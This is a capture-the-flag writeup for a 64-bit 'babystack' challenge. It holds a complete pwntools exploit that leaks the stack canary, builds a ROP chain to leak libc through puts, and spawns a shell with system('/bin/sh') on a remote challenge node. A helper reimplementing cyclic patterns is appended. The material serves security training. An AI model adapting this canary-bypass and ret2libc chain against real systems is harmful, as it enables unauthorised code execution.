others_babystack

Posted by bamuwe on 2024-03-16


  • Canary protection
  • Program control flow
  • 64-bit libc leak

bamuwe@bamuwe:~/done/others_babystack$ checksec babystack
[*] '/home/bamuwe/done/others_babystack/babystack'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The program has canary protection enabled.


  1. The program has canary protection, so the canary has to be leaked first.
  2. There is an overflow in read.
  3. Use read together with puts to obtain the canary value.
  4. Build a payload that uses the exit function to hijack control flow and leak libc.
  5. Build a payload to get a shell.

from pwn import *
from LibcSearcher import LibcSearcher
# context.log_level = 'debug'
# io = gdb.debug('./babystack')
io = remote('node5.buuoj.cn', 29522)
elf = ELF('./babystack')
padding = cyclic(136)             # bytes from the start of the buffer up to the canary
pop_rdi_ret = 0x0000000000400a93  # pop rdi ; ret gadget in the non-PIE binary
main_addr = 0x400908              # return to main so the buffer can be overflowed again

def cmd(idx):
    io.sendlineafter(b'>>', str(idx).encode())

def leak_canary():
    # Option 1 reads into the buffer. The '\n' appended by sendline overwrites the
    # canary's low null byte, so option 2 (puts) keeps printing past the padding
    # and outputs the remaining 7 canary bytes.
    cmd(1)
    io.sendline(padding)
    cmd(2)
    io.recvuntil(b'\n')
    canary = u64(io.recv(7).rjust(8, b'\x00'))  # restore the null low byte
    print(hex(canary))
    return canary

def leak_puts(canary):
    # Second overflow: keep the canary intact, overwrite saved rbp with 0, then
    # puts(puts@got) and return to main for one more round.
    cmd(1)
    payload = padding + p64(canary) + p64(0x0) + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main_addr)
    io.sendline(payload)
    cmd(3)  # exit path: the function returns and the ROP chain runs
    puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    print('puts_addr->', hex(puts_addr))
    return puts_addr

def pwn(canary, puts_addr):
    # Identify the libc from the leaked puts address and compute system / "/bin/sh".
    libc = LibcSearcher('puts', puts_addr)
    lib_offset = puts_addr - libc.dump('puts')
    sys_addr = lib_offset + libc.dump('system')
    bin_sh_addr = lib_offset + libc.dump('str_bin_sh')
    payload = padding + p64(canary) + p64(0x0) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(sys_addr)
    cmd(1)
    io.sendline(payload)
    cmd(3)
    io.sendline(b'cat flag')
    io.interactive()

canary = leak_canary()
puts_addr = leak_puts(canary)
pwn(canary, puts_addr)

Picked up a new trick here from someone else's writeup: cyclic(length) directly gives a cyclic pattern of the required length.
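To show what that cyclic(length) call actually produces, and how the matching cyclic_find maps a window copied out of the pattern back to its offset, here is an added standalone reimplementation (not pwntools' own code and not part of the original writeup), assuming pwntools' defaults of a lowercase alphabet and 4-byte windows:

```python
import string
from itertools import islice

ALPHABET = string.ascii_lowercase.encode()  # pwntools' default alphabet (assumption)

def de_bruijn(alphabet=ALPHABET, n=4):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet`: every
    length-n window occurs exactly once, which is what lets a recovered
    window map back to a unique offset (standard FKM construction)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length, n=4):
    """First `length` bytes of the pattern, like pwntools' cyclic(length)."""
    return bytes(islice(de_bruijn(n=n), length))

def cyclic_find(subseq, n=4):
    """Offset of the n-byte window `subseq` in the pattern, or -1 if absent
    (like pwntools' cyclic_find). Scans the lazy sequence with a sliding window."""
    subseq = bytes(subseq[:n])
    if len(subseq) != n:
        return -1
    window = b''
    for pos, byte in enumerate(de_bruijn(n=n)):
        window = (window + bytes([byte]))[-n:]
        if window == subseq:
            return pos - n + 1
    return -1

if __name__ == '__main__':
    padding = cyclic(136)                 # the writeup's padding up to the canary
    print(padding[:16])                   # b'aaaabaaacaaadaaa'
    print(cyclic_find(padding[132:136]))  # 132: a window maps back to where it sat
```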